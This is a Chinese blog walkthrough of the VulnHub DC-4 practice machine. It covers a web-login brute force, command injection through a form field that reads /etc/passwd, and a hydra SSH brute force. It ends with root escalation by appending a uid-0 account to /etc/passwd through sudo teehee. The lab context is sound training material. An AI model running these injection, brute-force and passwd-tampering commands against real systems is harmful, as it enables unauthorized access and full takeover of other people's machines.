vulnhub-dc4

已于 2022-10-06 14:23:09 修改
阅读量1.1k 收藏
点赞数
分类专栏: vulhub 文章标签: web安全 安全
于 2022-10-05 20:35:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55654781/article/details/127176553
版权

靶机地址

dc4链接:https://www.vulnhub.com/entry/dc-4,313/

打开靶机,设置为同一种nat模式

kali 信息收集主机发现

arp-scan -l

扫描ip端口,开放80,22端口访问网址

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cWVtaxH7-1664973268732)()]

burp 抓取数据包,进行爆破采用cluster bomb模块,添加字典1和字典2 账号密码(admin happy)

点击command,发现三条命令

burp抓包修改命令

radio=cat+/etc/passwd&submit=Run

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xxJHSMQt-1664973268736)(http://angus.gq/dc-4/4.png)]

发现三个用户,在charles用户下没有看到有用信息,切换到jim用户查看

radio=ls+-al+/home/jim&submit=Run

查看back目录下有old-passwords.bak

查看old-passwords.bak

利用hydra对三个用户进行ssh爆破,将三个用户名写入users.txt,密码写入passwd.txt

ssh登录jim账号

查看邮件,在cd /var/mail

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-W9LRkPi4-1665037339626)(http://angus.gq/dc-4/10.png#pic_center)]

如图可以知道Charles密码,切换用户,使用teehee命令

利用mkpasswd来生成密码

使用teehee来添加一个管理员用户到passwd文件里

sudo teehee -a /etc/passwd
test:$6$oBLtCRtnRR5VK/G6$.fgFjk6qyj2nO/Cc/V54BD64KTGP3gGUbn3fYCO3aR7vP749qAwK42yKouue05pahfBJey44JKqA..bIy32P0.:0:0:/root/root:/bin/bash

查看文件/etc/passwd

切换用户test

在cd /root/flag.txt

teehee命令解释
teehee是个小众的linux编辑器。如果有sudo权限。可以利用其来提权
linux中普通用户能临时使用root权限的命令,查看方式:

sudo -l

核心思路就是利用其在passwd文件中追加一条uid为0的用户条目

echo "raaj::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

按照linux用户机制,如果没有shadow条目,且passwd用户密码条目为空的时候,可以本地直接su空密码登录。所以只需要执行su raaj就可以登录到raaj用户,这个用户因为uid为0,所以也是root权限。

参考链接

https://blog.csdn.net/m0_62008601/article/details/124686217

bqAngus
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1922
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
vulnhub 4
willow_liang的博客
02-02 253
linsecurity-1,244 1.端口扫描 2.连接ssh 根据靶机提示,登录bob/secret账号 3.1使用socat提权 sudo socat tcp-listen:8833,reuseaddr,fork exec:sh,pty,stderr,setsid,sigint,sane socat FILE:`tty`,raw,echo=0 TCP:127.0.0.1:8833 3.2sudo执行ash提权 3.3bash提权 参考链接 tem..
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4588
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 1120
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
Vulnhub靶机:DC-4渗透详细过程
菜鸟学渗透
04-29 348
Vulnhub靶机:DC-4渗透详细过程
【VulnHub系列】DC4
大方子
04-09 677
https://note.youdao.com/s/FdSgf6NE
Vulnhub渗透靶机系列----DC4
m0_67284865的博客
08-18 111
vulnhub详细步骤解析,Vulnhub渗透靶机系列----DC4
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
Vulnhub靶机渗透测试——DC-4
Cobra的博客
05-03 1745
一、实验环境 攻击机(kail):192.168.189.148 靶机(ubuntu):192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183,再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口,访问其80端口,是一个登录框 4、在对其进行SQL注入,目录扫描无果后,果断选择暴力破解..
Vulnhub靶机:DC-4暴力破解——新手进阶4
m0_75051044的博客
03-22 1434
本次实验使用了两种破解admin用户密码的方式,明显使用hydra更快,使用brupsuite要对字典commompw.txt中7000多个密码进行暴力破解,时间太长了,所以直接用hydra爆破出来的密码登录,再用bruqsuite进行抓包更改命令,最后获取密码字典,然后接着用hydra爆破。显然还是不用bruqsuite更好。使用了两种提权方式,第一种:添加一个无密码用户,并使用teehee执行写入 passwd中,第二种:通过定时任务执行脚本提权。对比一下第一种提权更快。
Vulnhub DC-4
Pai_Space
02-17 583
描述: 只有一个标志,但从技术上讲,有多个入口点,就像上次一样,没有线索。 192.168.37.133 直接 submit 就可以登录 hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.37.133 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -f ...
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 346
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
Vulnhub系列之DC4靶场详解
weixin_50053818的博客
05-09 837
@ [TOC] 环境 vulhub系列之DC4靶场 VMware虚拟机 kali 爆破网站管理员用户拿shell 由目标靶机的Mac地址可以得出靶机IP为`192.168.43.140`.nmap扫描结果得知目标靶机开放了80端口和22端口,所以只能从目标网站下手。直接进入网首页。 根据首页信息可以知道,有admin用户,所以直接用burpsuite爆破,用软件自带密码即可。 爆破成功,密码是happy。登陆进去发现是命令执行,所以直接抓包改数据,反弹shell。 反弹shell成功,是用n
Vulnhub-DC-4靶机实战
御七彩虹猫
04-07 2380
Vulnhub-DC-4靶机实战
美信新一代DC-DC/AC-DC控制器:告别外部肖基特二极管
这些控制器支持宽输入电压范围的AC-DC转换器和电信DC-DC电源,以及低电压DC-DC应用。它们内置了门驱动器,可驱动外部N沟道MOSFET,并且内置误差放大器,具有1%的精度参考,省去了外部参考源的需求。" 在现代电子...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值